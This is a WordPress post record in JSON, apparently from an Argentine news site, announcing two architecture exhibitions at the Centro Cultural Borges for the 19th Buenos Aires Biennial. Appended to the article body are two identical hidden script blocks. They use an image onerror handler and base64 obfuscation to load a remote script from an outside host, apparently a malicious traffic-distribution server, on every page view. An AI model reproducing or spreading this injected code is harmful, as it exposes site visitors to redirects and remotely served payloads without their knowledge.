{"id":4465,"date":"2024-10-03T10:11:53","date_gmt":"2024-10-03T13:11:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4465"},"modified":"2025-08-13T23:47:44","modified_gmt":"2025-08-14T02:47:44","slug":"la-bienal-de-arquitectura-en-el-centro-cultural-borges","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4465","title":{"rendered":"La Bienal de Arquitectura en el Centro Cultural Borges"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-b7c9be77d809a9502f9a1f8e6eb38116\" style=\"background-color:#066da9\"><em>La exposici\u00f3n abrir\u00e1 su 19\u00aa edici\u00f3n el 9 de octubre. Como una de sus sedes, el Borges inaugurar\u00e1 dos muestras que se podr\u00e1n ver hasta el 15 de diciembre.<\/em><\/h4>\n\n\n\n<p>El\u00a0<a href=\"https:\/\/centroculturalborges.gob.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Centro Cultural Borges<\/a>, dependiente de la Secretar\u00eda de Cultura del Ministerio de Capital Humano, presentar\u00e1 dos exposiciones como parte de la 19\u00aa Bienal Internacional de Arquitectura de Buenos Aires, que se desarrollar\u00e1 entre el 9 y el 13 de octubre.<\/p>\n\n\n\n<p>En el Espacio Bon March\u00e9, se presentar\u00e1&nbsp;<strong><em>Sabia Madera: 30 a\u00f1os de visiones e innovaciones en la arquitectura en madera,<\/em><\/strong>&nbsp;bajo la direcci\u00f3n del Wood Program del Departamento de Arquitectura de la Universidad Aalto, Finlandia. A lo largo de sus 30 a\u00f1os de trayectoria, el Wood Program ha sido pionero en la investigaci\u00f3n, innovaci\u00f3n y la ense\u00f1anza acad\u00e9mica, proponiendo soluciones arquitect\u00f3nicas creativas que fomentan nuevos enfoques en la construcci\u00f3n industrializada sostenible.<\/p>\n\n\n\n<p>Desde 1994, el Wood Program explora las propiedades t\u00e9cnicas, arquitect\u00f3nicas y sostenibles de la madera, adoptando una visi\u00f3n integral de toda la cadena de construcci\u00f3n con este material. Los estudiantes comienzan su formaci\u00f3n con una inmersi\u00f3n en el entorno forestal y culminan construyendo un edificio experimental en madera. El programa se centra en el aprendizaje mediante el dise\u00f1o, la pr\u00e1ctica y la ejecuci\u00f3n.<\/p>\n\n\n\n<p>Cada a\u00f1o, la escala y el programa de dise\u00f1o var\u00eda, dando lugar a la realizaci\u00f3n de proyectos que abarcan desde viviendas y saunas hasta teatros y estaciones de tren. Las obras del Wood Program han sido distinguidas con numerosos premios nacionales e internacionales, entre los que destacan el Wood Architecture News en 2017, 2016 y 2014; el AR House Award en 2022, 2010 y 2009; los A+A Awards en 2023 y 2022; y el Rantasalmi Award en 2009.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/19bienal-arq-2024_ccborges-2.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">\u201cEspacio Infinito: \u00a1Imagine tener una relaci\u00f3n con un edificio!\u201d, forma parte de la 19\u00aa Bienal de Arquitectura de Buenos Aires que se podr\u00e1 ver en el Centro Cultural Borges.<\/figcaption><\/figure>\n\n\n\n<p>A continuaci\u00f3n, en el Espacio Infinito, se podr\u00e1 ver\u00a0<strong><em>\u00a1Imagine tener una relaci\u00f3n con un edificio!,<\/em><\/strong>\u00a0una exhibici\u00f3n curada por Vladimir Belogolovsky. Esta muestra colectiva re\u00fane seis proyectos innovadores de arquitectos destacados en todo el mundo. Los trabajos de\u00a0<strong>Winka Dubbeldam, Philip F. Yuan, Francisco Gonz\u00e1lez-Pulido, Dimitri Shapakidze, Irakli Abashidze, Sameep Padora<\/strong>\u00a0y\u00a0<strong>Sergei Tchoban<\/strong>\u00a0presentan formas de experimentar los edificios desde perspectivas sociales, materiales y emocionales. Estos proyectos h\u00edbridos desaf\u00edan las concepciones tradicionales sobre la arquitectura, invitando al p\u00fablico a reflexionar sobre su relaci\u00f3n con los espacios que habita.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/19bienal-arq-2024_flyer_borges.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>La&nbsp;<a href=\"https:\/\/labienalarg.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Bienal Internacional de Arquitectura de Buenos Aires<\/a>&nbsp;es una plataforma de producci\u00f3n y reflexi\u00f3n contempor\u00e1nea, construida en base a propuestas y di\u00e1logos entre la arquitectura, el urbanismo, la ecolog\u00eda, el arte y el dise\u00f1o. Pionera de las Bienales de Latinoam\u00e9rica y reconocida dentro de la trilog\u00eda m\u00e1s relevante, junto con la de Venecia y San Pablo, es organizada por la Asociaci\u00f3n Bienal Internacional de Arquitectura de Buenos Aires, CAYC y 90_20.<\/p>\n\n\n\n<p>Centro Cultural Borges, Viamonte 525 (CABA). De mi\u00e9rcoles a domingo de 14 a 20 h.<\/p>\n\n\n\n<p>Entrada libre y gratuita.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/la-bienal-de-arquitectura-en-el-centro-cultural-borges\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:252px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La exposici\u00f3n abrir\u00e1 su 19\u00aa edici\u00f3n el 9 de octubre. Como una de sus sedes, el Borges inaugurar\u00e1 dos muestras que se podr\u00e1n ver hasta el 15 de diciembre. El\u00a0Centro Cultural Borges, dependiente de la Secretar\u00eda de Cultura del Ministerio de Capital Humano, presentar\u00e1 dos exposiciones como parte de la 19\u00aa Bienal Internacional de Arquitectura [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4466,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,21],"tags":[],"class_list":{"0":"post-4465","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4465"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4465"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4465\/revisions"}],"predecessor-version":[{"id":6669,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4465\/revisions\/6669"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4466"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4465"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4465"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}